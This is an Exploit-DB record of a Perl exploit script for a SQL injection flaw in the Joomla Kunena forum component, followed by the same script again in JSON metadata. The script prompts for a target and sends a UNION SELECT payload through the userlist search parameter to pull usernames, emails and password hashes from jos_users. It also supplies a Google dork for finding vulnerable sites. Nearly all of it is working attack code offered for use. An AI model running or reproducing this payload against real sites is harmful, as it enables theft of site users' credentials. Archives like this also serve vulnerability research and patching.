ID EDB-ID:22153
Type exploitdb
Reporter D35m0nd142
Modified 2012-10-22T00:00:00
Description
Joomla Kunena Component (index.php search parameter) SQL Injection. Webapps exploit for php platform
#!/usr/bin/perl
#Exploit title: Joomla Component com_kunena SQL Injection exploit
#Google Dork: inurl:index.php?option=com_kunena&
#Exploit Author: D35m0nd142
#Screenshot : http://imageshack.us/f/155/comkunena2.png/
#Vendor HomePage: http://www.joomla.org/
#Special thanks to Taurusomar
system("clear");
print "*********************************************\n";
print "* Joomla Component com_kunena SQL Injection *\n";
print "* Coded by D35m0nd142 *\n";
print "*********************************************\n";
sleep 1;
use LWP::UserAgent;
print "Enter the target --> ";
chomp(my $target=<STDIN>);
$code="%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20;";
$agent = LWP::UserAgent->new() or die "[!] Error while processing";
$agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011');
$host= $target. "/index.php?option=com_kunena&func=userlist&search=".$code;
$ok = $agent->request(HTTP::Request->new(GET=>$host));
$ok1 = $ok->content; if ($ok1 =~/([0-9a-fA-F]{32})/){
print "[+] Password found --> $1\n$2\n";
sleep 1;
}
else
{
print "Password not found \n";
}
{"id": "EDB-ID:22153", "hash": "4ef44449823c16bf81ab3324100a3783", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Joomla Kunena Component index.php search parameter SQL Injection", "description": "Joomla Kunena Component (index.php search parameter) SQL Injection. Webapps exploit for php platform", "published": "2012-10-22T00:00:00", "modified": "2012-10-22T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/22153/", "reporter": "D35m0nd142", "references": [], "cvelist": [], "lastseen": "2016-02-02T18:05:52", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2016-02-02T18:05:52"}, "dependencies": {"references": [], "modified": "2016-02-02T18:05:52"}, "vulnersScore": 0.3}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/22153/", "sourceData": "#!/usr/bin/perl \r\n#Exploit title: Joomla Component com_kunena SQL Injection exploit \r\n#Google Dork: inurl:index.php?option=com_kunena&\r\n#Exploit Author: D35m0nd142\r\n#Screenshot : http://imageshack.us/f/155/comkunena2.png/\r\n#Vendor HomePage: http://www.joomla.org/ \r\n#Special thanks to Taurusomar\r\nsystem(\"clear\");\r\nprint \"*********************************************\\n\";\r\nprint \"* Joomla Component com_kunena SQL Injection *\\n\";\r\nprint \"* Coded by D35m0nd142 *\\n\";\r\nprint \"*********************************************\\n\";\r\nsleep 1;\r\nuse LWP::UserAgent;\r\nprint \"Enter the target --> \";\r\nchomp(my $target=<STDIN>);\r\n$code=\"%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20;\";\r\n$agent = LWP::UserAgent->new() or die \"[!] Error while processing\";\r\n$agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011');\r\n$host= $target. \"/index.php?option=com_kunena&func=userlist&search=\".$code;\r\n$ok = $agent->request(HTTP::Request->new(GET=>$host));\r\n$ok1 = $ok->content; if ($ok1 =~/([0-9a-fA-F]{32})/){\r\nprint \"[+] Password found --> $1\\n$2\\n\";\r\nsleep 1;\r\n}\r\nelse\r\n{\r\nprint \"Password not found \\n\";\r\n}\r\n", "osvdbidlist": ["86718"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{}
